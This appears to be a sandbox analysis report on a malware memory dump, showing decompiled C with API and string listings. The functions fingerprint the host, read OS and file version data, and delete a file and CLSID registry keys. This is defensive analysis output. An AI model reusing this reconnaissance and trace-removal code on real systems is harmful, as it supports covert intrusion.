                                                                                    0x04ecafe4
                                                                                    0x04ecafe4
                                                                                    0x04ecafe7
                                                                                    0x04ecafea
                                                                                    0x04ecafef
                                                                                    0x04ecafef
                                                                                    0x04ecafc3
                                                                                    0x04ecafc3
                                                                                    0x04ecafce
                                                                                    0x04ecafd5
                                                                                    0x04ecafd5
                                                                                    0x04ecafd5
                                                                                    0x04ecafd5
                                                                                    0x04ecaffb
                                                                                    0x04ecb000
                                                                                    0x04ecb002
                                                                                    0x04ecb01a
                                                                                    0x04ecb01d
                                                                                    0x04ecb023
                                                                                    0x04ecb023
                                                                                    0x04ecb025
                                                                                    0x04ecb025
                                                                                    0x04ecb028
                                                                                    0x04ecb02c
                                                                                    0x04ecb02f
                                                                                    0x04ecb02f
                                                                                    0x04ecb004
                                                                                    0x04ecb004
                                                                                    0x04ecb016
                                                                                    0x04ecb016
                                                                                    0x04ecb016
                                                                                    0x04ecb016
                                                                                    0x04ecb034
                                                                                    0x04ecb037
                                                                                    0x04ecb03d
                                                                                    0x04ecb03d
                                                                                    0x04ecb040
                                                                                    0x04ecb040
                                                                                    0x04ecb043
                                                                                    0x04ecb043
                                                                                    0x04ecb046
                                                                                    0x04ecb04b
                                                                                    0x04ecb04b
                                                                                    0x04ecb053
                                                                                    0x04ecb058
                                                                                    0x04ecb05a
                                                                                    0x04ecb05e
                                                                                    0x04ecb062
                                                                                    0x04ecb06a
                                                                                    0x04ecb07e
                                                                                    0x04ecb088
                                                                                    0x04ecb088
                                                                                    0x04ecad9a
                                                                                    0x04ecad9a
                                                                                    0x04ecadb0
                                                                                    0x04ecadb0

                                                                                    APIs
                                                                                      • Part of subcall function 04EB62B0: RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Classes\.codein,00000000,00020119,04ECB38C,?,04F05318,?,?,04ECB38C), ref: 04EB6350
                                                                                      • Part of subcall function 04EB62B0: RegCloseKey.ADVAPI32(04ECB38C,?,04F05318,?,?,04ECB38C), ref: 04EB635D
                                                                                    • GetTickCount.KERNEL32 ref: 04ECAE19
                                                                                    • GetCurrentProcessId.KERNEL32(?,?,?,00000000), ref: 04ECAE25
                                                                                    • gethostname.WS2_32(?,00000100), ref: 04ECAE6A
                                                                                    • GetSystemInfo.KERNEL32(?), ref: 04ECAEFB
                                                                                    • RegOpenKeyW.ADVAPI32 ref: 04ECAF2C
                                                                                    • RegQueryValueExW.ADVAPI32(00000004,~MHz,00000000,00000004,00000004,?,?,?,?,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,?), ref: 04ECAF4C
                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,?), ref: 04ECAF56
                                                                                    • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,80000002), ref: 04ECAF73
                                                                                    • CoInitialize.OLE32(00000000), ref: 04ECAF90
                                                                                    • CoUninitialize.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,80000002), ref: 04ECAFA3
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseOpen$CountCurrentGlobalInfoInitializeMemoryProcessQueryStatusSystemTickUninitializeValuegethostname
                                                                                    • String ID: /$@$HARDWARE\DESCRIPTION\System\CentralProcessor\0$~MHz
                                                                                    • API String ID: 3586792383-1973391949
                                                                                    • Opcode ID: 211c3b46e36ce97cf7c2f3167de591454ee8d12c2ad7367409ca1472b8c77c9c
                                                                                    • Instruction ID: 6ae32726082f3e57f4171b876e2f09853016f7351878eedcb075500074970592
                                                                                    • Opcode Fuzzy Hash: 211c3b46e36ce97cf7c2f3167de591454ee8d12c2ad7367409ca1472b8c77c9c
                                                                                    • Instruction Fuzzy Hash: 4A91CE71504385CFEB11DF64C984BAAB7E4FF88308F04556DED899B241EB34AA85CB92
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EBA820, Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 85registryfileCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 89%
                                                                                    			E04EBA820(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				signed int _v8;
				char _v88;
				short _v608;
				short _v1128;
				void* _v1132;
				signed int _t22;
				void* _t50;
				signed int _t64;
				void* _t69;

				_t69 = __eflags;
				_t63 = __esi;
				_t62 = __edi;
				_t22 =  *0x4f03008; // 0x3d21fb31
				_v8 = _t22 ^ _t64;
				_t50 = __ecx;
				_push(0);
				E04EC6330(__ecx, L"winssyslog",  &_v608, __edi, __esi, 8);
				DeleteFileW( &_v608);
				E04EB78A0(_t50, L"Control", 0x1fffffff, __edi, __esi, _t69);
				E04EC6010(_t50, L"Global",  &_v88, __edi, __esi);
				wsprintfW( &_v608, L"SOFTWARE\\Classes\\CLSID\\%s",  &_v88);
				_v1132 = 0;
				if(RegOpenKeyExW(0x80000002,  &_v608, 0, 0x20106,  &_v1132) == 0) {
					SHDeleteKeyW(_v1132, 0x4efb5d0);
					RegCloseKey(_v1132);
				}
				E04EC6010(_t50, L"Pg",  &_v88, _t62, _t63);
				wsprintfW( &_v1128, L"SOFTWARE\\Classes\\CLSID\\%s",  &_v88);
				_v1132 = 0;
				if(RegOpenKeyExW(0x80000002,  &_v1128, 0, 0x20106,  &_v1132) == 0) {
					SHDeleteKeyW(_v1132, 0x4efb5d0);
					RegCloseKey(_v1132);
				}
				CreateEventA(0, 1, 0, _t50 + 0xc);
				return E04ED572E(_v8 ^ _t64);
			}












                                                                                    0x04eba820
                                                                                    0x04eba820
                                                                                    0x04eba820
                                                                                    0x04eba829
                                                                                    0x04eba830
                                                                                    0x04eba834
                                                                                    0x04eba83c
                                                                                    0x04eba845
                                                                                    0x04eba854
                                                                                    0x04eba864
                                                                                    0x04eba871
                                                                                    0x04eba886
                                                                                    0x04eba88f
                                                                                    0x04eba8bb
                                                                                    0x04eba8c8
                                                                                    0x04eba8d4
                                                                                    0x04eba8d4
                                                                                    0x04eba8e2
                                                                                    0x04eba8f7
                                                                                    0x04eba900
                                                                                    0x04eba92c
                                                                                    0x04eba939
                                                                                    0x04eba945
                                                                                    0x04eba945
                                                                                    0x04eba955
                                                                                    0x04eba969

                                                                                    APIs
                                                                                      • Part of subcall function 04EC6330: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 04EC6356
                                                                                    • DeleteFileW.KERNEL32(?), ref: 04EBA854
                                                                                      • Part of subcall function 04EB78A0: wsprintfW.USER32 ref: 04EB78CF
                                                                                      • Part of subcall function 04EB78A0: RegCreateKeyExW.ADVAPI32(80000002,?,00000000,00000000,00000000,000F013F,00000000,?,00000000), ref: 04EB7909
                                                                                      • Part of subcall function 04EB78A0: RegSetValueExW.ADVAPI32(?,04EFD09C,00000000,00000004,?,00000004), ref: 04EB792A
                                                                                      • Part of subcall function 04EB78A0: RegCloseKey.ADVAPI32(?), ref: 04EB7940
                                                                                      • Part of subcall function 04EC6010: RegOpenKeyExW.KERNEL32(80000002,004F0053,00000000,00020119,?,00000000,00000000,00000378), ref: 04EC61B1
                                                                                      • Part of subcall function 04EC6010: RegQueryValueExW.KERNEL32(?,0061004D,00000000,?,?,0000004A), ref: 04EC61DF
                                                                                      • Part of subcall function 04EC6010: RegCloseKey.ADVAPI32(?), ref: 04EC61F5
                                                                                    • wsprintfW.USER32 ref: 04EBA886
                                                                                    • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020106,00000000), ref: 04EBA8B3
                                                                                    • SHDeleteKeyW.SHLWAPI(00000000,04EFB5D0), ref: 04EBA8C8
                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 04EBA8D4
                                                                                    • wsprintfW.USER32 ref: 04EBA8F7
                                                                                    • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020106,00000000), ref: 04EBA924
                                                                                    • SHDeleteKeyW.SHLWAPI(00000000,04EFB5D0), ref: 04EBA939
                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 04EBA945
                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,?), ref: 04EBA955
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Close$DeleteOpenwsprintf$CreateValue$DirectoryEventFileQuerySystem
                                                                                    • String ID: Control$Global$SOFTWARE\Classes\CLSID\%s$winssyslog
                                                                                    • API String ID: 164381605-1386177884
                                                                                    • Opcode ID: e8ac6f4ed923127f89c637b8f54f2481bde2e6d7f0519ff9e1f0e76d1952470b
                                                                                    • Instruction ID: 1fe96452a157f9c1a7e7aa153a855bc9d57352524747dfc00b0f5ee5e7382fa1
                                                                                    • Opcode Fuzzy Hash: e8ac6f4ed923127f89c637b8f54f2481bde2e6d7f0519ff9e1f0e76d1952470b
                                                                                    • Instruction Fuzzy Hash: 2431C470900218ABEB10DFA0DC4AFED777DEB84705F104199AF06E6084EE756E88CF65
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EC5D90, Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 151COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 92%
                                                                                    			E04EC5D90(void* __ebx, short* __ecx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr* _a8) {
				signed int _v8;
				short _v528;
				void* _v532;
				int _v536;
				short* _v540;
				void* _v544;
				int _v548;
				int _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				signed int _t45;
				intOrPtr _t47;
				intOrPtr _t48;
				intOrPtr _t49;
				short _t50;
				int _t54;
				signed int _t81;
				signed int _t82;
				signed int _t83;
				signed int _t88;
				short* _t89;
				signed int _t90;
				signed int _t91;
				signed short* _t94;
				signed short* _t95;
				signed short* _t96;
				short* _t98;
				void* _t100;
				void* _t102;
				intOrPtr* _t104;
				void* _t105;
				intOrPtr* _t107;
				void* _t108;
				signed int _t109;
				void* _t110;
				void* _t111;
				void* _t113;
				void* _t114;

				_t89 = __ecx;
				_t45 =  *0x4f03008; // 0x3d21fb31
				_v8 = _t45 ^ _t109;
				_t47 =  *0x4efd690; // 0x2a
				_t107 = _a4;
				_t104 = _a8;
				 *((intOrPtr*)(__edx)) = _t47;
				_t48 =  *0x4efd690; // 0x2a
				_v556 = __edx;
				_t98 =  &(__ecx[1]);
				 *_t104 = _t48;
				_t49 =  *0x4efd690; // 0x2a
				_v540 = __ecx;
				_v560 = _t104;
				 *_t107 = _t49;
				do {
					_t50 =  *_t89;
					_t89 =  &(_t89[1]);
				} while (_t50 != 0);
				_t90 = _t89 - _t98;
				_t91 = _t90 >> 1;
				if(_t90 != 0) {
					_t54 = GetFileVersionInfoSizeW(_v540,  &_v552);
					_v548 = _t54;
					_t118 = _t54;
					if(_t54 != 0) {
						_push(_t54);
						_t105 = E04ED5785(_t91, _t107, _t118);
						_t111 = _t110 + 4;
						if(_t105 != 0) {
							if(GetFileVersionInfoW(_v540, _v552, _v548, _t105) != 0 && VerQueryValueW(_t105, L"\\VarFileInfo\\Translation",  &_v544,  &_v536) != 0) {
								_t88 = ( *_v544 & 0x0000ffff) << 0x00000010 |  *(_v544 + 2) & 0x0000ffff;
								wsprintfW( &_v528, L"\\StringFileInfo\\%08lx\\FileDescription", _t88);
								_t113 = _t111 + 0xc;
								if(VerQueryValueW(_t105,  &_v528,  &_v532,  &_v536) != 0) {
									_t96 = _v532;
									_t102 = _v556 - _t96;
									do {
										_t83 =  *_t96 & 0x0000ffff;
										_t96 =  &(_t96[1]);
										 *(_t102 + _t96 - 2) = _t83;
									} while (_t83 != 0);
								}
								wsprintfW( &_v528, L"\\StringFileInfo\\%08lx\\CompanyName", _t88);
								_t114 = _t113 + 0xc;
								if(VerQueryValueW(_t105,  &_v528,  &_v532,  &_v536) != 0) {
									_t95 = _v532;
									_t100 = _v560 - _t95;
									asm("o16 nop [eax+eax]");
									do {
										_t82 =  *_t95 & 0x0000ffff;
										_t95 =  &(_t95[1]);
										 *(_t100 + _t95 - 2) = _t82;
									} while (_t82 != 0);
								}
								wsprintfW( &_v528, L"\\StringFileInfo\\%08lx\\ProductVersion", _t88);
								_t111 = _t114 + 0xc;
								if(VerQueryValueW(_t105,  &_v528,  &_v532,  &_v536) != 0) {
									_t94 = _v532;
									_t108 = _t107 - _t94;
									do {
										_t81 =  *_t94 & 0x0000ffff;
										_t94 =  &(_t94[1]);
										 *(_t108 + _t94 - 2) = _t81;
									} while (_t81 != 0);
								}
							}
							E04ED573F(_t105);
						}
					}
				}
				return E04ED572E(_v8 ^ _t109);
			}









































                                                                                    0x04ec5d90
                                                                                    0x04ec5d99
                                                                                    0x04ec5da0
                                                                                    0x04ec5da3
                                                                                    0x04ec5daa
                                                                                    0x04ec5db0
                                                                                    0x04ec5db3
                                                                                    0x04ec5db5
                                                                                    0x04ec5dba
                                                                                    0x04ec5dc0
                                                                                    0x04ec5dc3
                                                                                    0x04ec5dc5
                                                                                    0x04ec5dca
                                                                                    0x04ec5dd0
                                                                                    0x04ec5dd6
                                                                                    0x04ec5de0
                                                                                    0x04ec5de0
                                                                                    0x04ec5de3
                                                                                    0x04ec5de6
                                                                                    0x04ec5deb
                                                                                    0x04ec5ded
                                                                                    0x04ec5def
                                                                                    0x04ec5e02
                                                                                    0x04ec5e08
                                                                                    0x04ec5e0e
                                                                                    0x04ec5e10
                                                                                    0x04ec5e16
                                                                                    0x04ec5e1c
                                                                                    0x04ec5e1e
                                                                                    0x04ec5e23
                                                                                    0x04ec5e44
                                                                                    0x04ec5e7c
                                                                                    0x04ec5e8b
                                                                                    0x04ec5e91
                                                                                    0x04ec5eb2
                                                                                    0x04ec5eba
                                                                                    0x04ec5ec0
                                                                                    0x04ec5ec2
                                                                                    0x04ec5ec2
                                                                                    0x04ec5ec5
                                                                                    0x04ec5ec8
                                                                                    0x04ec5ecd
                                                                                    0x04ec5ec2
                                                                                    0x04ec5edf
                                                                                    0x04ec5ee5
                                                                                    0x04ec5f06
                                                                                    0x04ec5f0e
                                                                                    0x04ec5f14
                                                                                    0x04ec5f16
                                                                                    0x04ec5f20
                                                                                    0x04ec5f20
                                                                                    0x04ec5f23
                                                                                    0x04ec5f26
                                                                                    0x04ec5f2b
                                                                                    0x04ec5f20
                                                                                    0x04ec5f3d
                                                                                    0x04ec5f43
                                                                                    0x04ec5f64
                                                                                    0x04ec5f66
                                                                                    0x04ec5f6c
                                                                                    0x04ec5f70
                                                                                    0x04ec5f70
                                                                                    0x04ec5f73
                                                                                    0x04ec5f76
                                                                                    0x04ec5f7b
                                                                                    0x04ec5f70
                                                                                    0x04ec5f80
                                                                                    0x04ec5f83
                                                                                    0x04ec5f88
                                                                                    0x04ec5e23
                                                                                    0x04ec5e10
                                                                                    0x04ec5f9d

                                                                                    APIs
                                                                                    • GetFileVersionInfoSizeW.VERSION(?,?,00000001,74E069A0,00000000), ref: 04EC5E02
                                                                                    • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 04EC5E3C
                                                                                    • VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?), ref: 04EC5E5E
                                                                                    • wsprintfW.USER32 ref: 04EC5E8B
                                                                                    • VerQueryValueW.VERSION(00000000,?,?,?), ref: 04EC5EAA
                                                                                    • wsprintfW.USER32 ref: 04EC5EDF
                                                                                    • VerQueryValueW.VERSION(00000000,?,?,?), ref: 04EC5EFE
                                                                                    • wsprintfW.USER32 ref: 04EC5F3D
                                                                                    • VerQueryValueW.VERSION(00000000,?,?,?), ref: 04EC5F5C
                                                                                    Strings
                                                                                    • \StringFileInfo\%08lx\FileDescription, xrefs: 04EC5E85
                                                                                    • \VarFileInfo\Translation, xrefs: 04EC5E58
                                                                                    • \StringFileInfo\%08lx\CompanyName, xrefs: 04EC5ED9
                                                                                    • \StringFileInfo\%08lx\ProductVersion, xrefs: 04EC5F37
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: QueryValue$wsprintf$FileInfoVersion$Size
                                                                                    • String ID: \StringFileInfo\%08lx\CompanyName$\StringFileInfo\%08lx\FileDescription$\StringFileInfo\%08lx\ProductVersion$\VarFileInfo\Translation
                                                                                    • API String ID: 2317827058-2104189134
                                                                                    • Opcode ID: 86b17c8ada29fd596d544851fbbbf47f48e8aedb5927798631e0d20ef5243617
                                                                                    • Instruction ID: 11e48267e807b1705e42d11ef744526273bb0424d8e6bd60ad9471ad216cd88c
                                                                                    • Opcode Fuzzy Hash: 86b17c8ada29fd596d544851fbbbf47f48e8aedb5927798631e0d20ef5243617
                                                                                    • Instruction Fuzzy Hash: BA514F75900219ABCB25CF65DD88EEAB7B8EF44305F1451D9E809D7204EB35BA85CF50
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04ED5490, Relevance: 22.7, APIs: 15, Instructions: 153timememoryCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 92%
                                                                                    			E04ED5490(LONG* __ecx, signed int __edx, long _a4) {
				long _v8;
				signed int _v12;
				void* _v16;
				long _t38;
				long _t52;
				unsigned int _t64;
				void* _t67;
				void* _t68;
				void** _t71;
				void* _t72;
				void** _t75;
				void* _t76;
				long _t82;
				LONG* _t88;
				void* _t89;

				_v12 = __edx;
				_t88 = __ecx;
				if(_a4 == 0) {
					if(__ecx[1] == 0) {
						L24:
						return _t38;
					}
					_t64 = 0xaaaaaaab * __edx >> 0x20 >> 1;
					if(_t64 >= 0x3a98) {
						_t64 = 0x3a98;
					} else {
						if(_t64 <= 0x3e8) {
							_t64 = 0x3e8;
						}
					}
					_t38 =  <  ? 0x7fffffff : timeGetTime() - _t88[4];
					if(_t38 < _t64) {
						goto L24;
					} else {
						_t82 = 0;
						_a4 = 1;
						_v8 = 0;
						_t38 = InterlockedCompareExchange(_t88, 1, 0);
						asm("sbb ebx, ebx");
						_t67 =  ~_t38 + 1;
						if(_t67 == 0) {
							goto L24;
						}
						L12:
						L12:
						if(_a4 != 0) {
							_a4 = 0;
							_t52 = timeGetTime();
							_t82 = _t52;
							_v8 = _t82;
							if(_t82 == 0) {
								_t52 = timeGetTime();
							}
							_t88[4] = _t52;
						}
						_t38 = _t88[2];
						_t75 =  *(_t38 + 4);
						if(_t75 == 0) {
							goto L22;
						}
						_t76 =  *_t75;
						_v16 = _t76;
						_t38 = _t82 -  *((intOrPtr*)(_t76 + 0x34));
						if(_t38 < _v12) {
							goto L22;
						}
						_t88[2] =  *(_t88[2] + 4);
						InterlockedDecrement( &(_t88[1]));
						_push(8);
						E04ED5777(_t88[2]);
						_t89 = _t89 + 8;
						if(_t67 != 0) {
							 *_t88 = 0;
						}
						_t68 = _v16;
						E04ED4FF0(_t68 + 0x8c);
						DeleteCriticalSection(_t68 + 0x6c);
						DeleteCriticalSection(_t68 + 0x54);
						HeapFree( *( *_t68), 0, _t68);
						_t38 = InterlockedCompareExchange(_t88, 1, 0);
						asm("sbb ebx, ebx");
						_t67 =  ~_t38 + 1;
						if(_t67 == 0) {
							goto L24;
						} else {
							_t82 = _v8;
							goto L12;
						}
						L22:
						if(_t67 == 0) {
							goto L24;
						}
						L23:
						 *_t88 = 0;
						return _t38;
					}
				}
				if(InterlockedCompareExchange(__ecx, 1, 0) == 0) {
					while(1) {
						L3:
						_t38 = _t88[2];
						_t71 =  *(_t38 + 4);
						if(_t71 == 0) {
							goto L23;
						}
						_t72 =  *_t71;
						_t88[2] =  *(_t88[2] + 4);
						InterlockedDecrement( &(_t88[1]));
						_push(8);
						E04ED5777(_t88[2]);
						_t89 = _t89 + 8;
						E04ED4FF0(_t72 + 0x8c);
						DeleteCriticalSection(_t72 + 0x6c);
						DeleteCriticalSection(_t72 + 0x54);
						HeapFree( *( *_t72), 0, _t72);
					}
					goto L23;
				} else {
					goto L2;
				}
				do {
					L2:
					asm("pause");
				} while (InterlockedCompareExchange(_t88, 1, 0) != 0);
				goto L3;
			}


















                                                                                    0x04ed549d
                                                                                    0x04ed54a0
                                                                                    0x04ed54a2
                                                                                    0x04ed5522
                                                                                    0x04ed565b
                                                                                    0x04ed565b
                                                                                    0x04ed565b
                                                                                    0x04ed5531
                                                                                    0x04ed5539
                                                                                    0x04ed554a
                                                                                    0x04ed553b
                                                                                    0x04ed5541
                                                                                    0x04ed5543
                                                                                    0x04ed5543
                                                                                    0x04ed5541
                                                                                    0x04ed5564
                                                                                    0x04ed5569
                                                                                    0x00000000
                                                                                    0x04ed556f
                                                                                    0x04ed556f
                                                                                    0x04ed5571
                                                                                    0x04ed557c
                                                                                    0x04ed557f
                                                                                    0x04ed5589
                                                                                    0x04ed558b
                                                                                    0x04ed558e
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ed5594
                                                                                    0x04ed5598
                                                                                    0x04ed559a
                                                                                    0x04ed55a1
                                                                                    0x04ed55a7
                                                                                    0x04ed55a9
                                                                                    0x04ed55ae
                                                                                    0x04ed55b0
                                                                                    0x04ed55b0
                                                                                    0x04ed55b6
                                                                                    0x04ed55b6
                                                                                    0x04ed55b9
                                                                                    0x04ed55bc
                                                                                    0x04ed55c1
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ed55c7
                                                                                    0x04ed55cb
                                                                                    0x04ed55ce
                                                                                    0x04ed55d4
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ed55dc
                                                                                    0x04ed55e3
                                                                                    0x04ed55e9
                                                                                    0x04ed55ec
                                                                                    0x04ed55f1
                                                                                    0x04ed55f6
                                                                                    0x04ed55f8
                                                                                    0x04ed55f8
                                                                                    0x04ed55fe
                                                                                    0x04ed5609
                                                                                    0x04ed5612
                                                                                    0x04ed561c
                                                                                    0x04ed5627
                                                                                    0x04ed5632
                                                                                    0x04ed563c
                                                                                    0x04ed563e
                                                                                    0x04ed5641
                                                                                    0x00000000
                                                                                    0x04ed5643
                                                                                    0x04ed5643
                                                                                    0x00000000
                                                                                    0x04ed5643
                                                                                    0x04ed564b
                                                                                    0x04ed564d
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ed564f
                                                                                    0x04ed564f
                                                                                    0x00000000
                                                                                    0x04ed564f
                                                                                    0x04ed5569
                                                                                    0x04ed54b3
                                                                                    0x04ed54c2
                                                                                    0x04ed54c2
                                                                                    0x04ed54c2
                                                                                    0x04ed54c5
                                                                                    0x04ed54ca
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ed54d3
                                                                                    0x04ed54d8
                                                                                    0x04ed54df
                                                                                    0x04ed54e5
                                                                                    0x04ed54e8
                                                                                    0x04ed54f5
                                                                                    0x04ed54f8
                                                                                    0x04ed5501
                                                                                    0x04ed550b
                                                                                    0x04ed5516
                                                                                    0x04ed5516
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ed54b5
                                                                                    0x04ed54b5
                                                                                    0x04ed54b5
                                                                                    0x04ed54be
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 04ED54AF
                                                                                    • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 04ED54BC
                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 04ED54DF
                                                                                    • DeleteCriticalSection.KERNEL32(?), ref: 04ED5501
                                                                                    • DeleteCriticalSection.KERNEL32(00000000), ref: 04ED550B
                                                                                    • HeapFree.KERNEL32(?,00000000,?), ref: 04ED5516
                                                                                    • timeGetTime.WINMM ref: 04ED5552
                                                                                    • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 04ED557F
                                                                                    • timeGetTime.WINMM ref: 04ED55A1
                                                                                    • timeGetTime.WINMM ref: 04ED55B0
                                                                                    • InterlockedDecrement.KERNEL32(00000000), ref: 04ED55E3
                                                                                    • DeleteCriticalSection.KERNEL32(?,?,?), ref: 04ED5612
                                                                                    • DeleteCriticalSection.KERNEL32(00000000), ref: 04ED561C
                                                                                    • HeapFree.KERNEL32(?,00000000,?), ref: 04ED5627
                                                                                    • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 04ED5632
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Interlocked$CompareCriticalDeleteExchangeSection$Timetime$DecrementFreeHeap
                                                                                    • String ID:
                                                                                    • API String ID: 517897276-0
                                                                                    • Opcode ID: c4927a1f5f2df6e845e22346fd5edbc3c738ec627cd77b88d2420eac0360fff6
                                                                                    • Instruction ID: edd939a58fa5c79cb8f0d871f8c427b3e9feb3aeef498c208bef575eec686972
                                                                                    • Opcode Fuzzy Hash: c4927a1f5f2df6e845e22346fd5edbc3c738ec627cd77b88d2420eac0360fff6
                                                                                    • Instruction Fuzzy Hash: 0B51C272600301BFDB20DFA5C9C8B59BBB9EF84305F144529E9168B294DB78F946CB51
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EC5A10, Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 147libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 68%
                                                                                    			E04EC5A10(intOrPtr* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				char _v18;
				struct _OSVERSIONINFOW _v300;
				signed int _v304;
				char _v308;
				char _v312;
				intOrPtr _v316;
				char _v348;
				signed int _t45;
				_Unknown_base(*)()* _t49;
				intOrPtr _t50;
				intOrPtr _t57;
				_Unknown_base(*)()* _t61;
				intOrPtr _t65;
				signed int _t73;
				intOrPtr _t76;
				intOrPtr _t86;
				intOrPtr _t89;
				signed short* _t90;
				intOrPtr _t93;
				void* _t95;
				void* _t97;
				signed int _t98;
				intOrPtr* _t100;
				signed int _t101;
				void* _t118;

				_t45 =  *0x4f03008; // 0x3d21fb31
				_v8 = _t45 ^ _t101;
				_t100 = __ecx;
				E04EDDAD0(__edi, __ecx, 0, 0x120);
				_t97 = LoadLibraryA;
				_t49 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GetNativeSystemInfo");
				if(_t49 == 0) {
					L4:
					_t50 = 0;
				} else {
					asm("xorps xmm0, xmm0");
					_v316 = 0;
					asm("movups [ebp-0x158], xmm0");
					asm("movups [ebp-0x148], xmm0");
					 *_t49( &_v348);
					_t76 = _v348;
					if(_t76 == 6 || _t76 == 9) {
						_t50 = 1;
					} else {
						goto L4;
					}
				}
				 *((intOrPtr*)(_t100 + 0x10)) = _t50;
				 *((intOrPtr*)(_t100 + 0x14)) = E04EC5980(GetCurrentProcess());
				E04EDDAD0(_t97,  &_v300, 0, 0x11c);
				_v300.dwOSVersionInfoSize = 0x11c;
				if(GetVersionExW( &_v300) != 0) {
					_t89 = _v300.dwMajorVersion;
					_t93 = _v300.dwMinorVersion;
					 *(_t100 + 8) = _v300.dwBuildNumber;
					 *((intOrPtr*)(_t100 + 0xc)) = _v300.dwPlatformId;
					 *_t100 = _t89;
					 *((intOrPtr*)(_t100 + 4)) = _t93;
					 *(_t100 + 0x1c) = 0 | _v18 != 0x00000001;
					if(_t89 == 5 && _t93 == 2) {
						 *((intOrPtr*)(_t100 + 0x18)) = GetSystemMetrics(0x59);
					}
					_t90 =  &(_v300.szCSDVersion);
					_t23 = _t100 + 0x20; // 0x20
					_t95 = _t23 - _t90;
					do {
						_t73 =  *_t90 & 0x0000ffff;
						_t90 =  &(_t90[1]);
						 *(_t95 + _t90 - 2) = _t73;
					} while (_t73 != 0);
				}
				_t57 =  *_t100;
				if(_t57 != 6 ||  *((intOrPtr*)(_t100 + 4)) != 2) {
					if(_t57 != 0) {
						goto L21;
					} else {
						goto L14;
					}
				} else {
					L14:
					_t61 = GetProcAddress(LoadLibraryA("ntdll.dll"), "RtlGetNtVersionNumbers");
					if(_t61 == 0) {
						return E04ED572E(_v8 ^ _t101);
					} else {
						 *_t61( &_v308,  &_v312,  &_v304);
						_t98 = _v304 & 0x0000ffff;
						_t92 =  *_t100;
						_t65 = _v308;
						_t86 = _v312;
						_v304 = _t98;
						_t118 = _t65 -  *_t100;
						if(_t118 > 0 || _t118 == 0 && _t86 >  *((intOrPtr*)(_t100 + 4))) {
							 *_t100 = _t65;
							 *((intOrPtr*)(_t100 + 4)) = _t86;
							 *(_t100 + 8) = _t98;
							 *(_t100 + 0x1c) = 0 | E04EC5870(_t92, _t98) != 0x00000000;
							if( *_t100 == 5 &&  *((intOrPtr*)(_t100 + 4)) == 2) {
								 *((intOrPtr*)(_t100 + 0x18)) = GetSystemMetrics(0x59);
							}
						}
						L21:
						return E04ED572E(_v8 ^ _t101);
					}
				}
			}





























                                                                                    0x04ec5a19
                                                                                    0x04ec5a20
                                                                                    0x04ec5a2a
                                                                                    0x04ec5a2f
                                                                                    0x04ec5a34
                                                                                    0x04ec5a4a
                                                                                    0x04ec5a52
                                                                                    0x04ec5a91
                                                                                    0x04ec5a91
                                                                                    0x04ec5a54
                                                                                    0x04ec5a54
                                                                                    0x04ec5a57
                                                                                    0x04ec5a68
                                                                                    0x04ec5a6f
                                                                                    0x04ec5a76
                                                                                    0x04ec5a78
                                                                                    0x04ec5a82
                                                                                    0x04ec5a8a
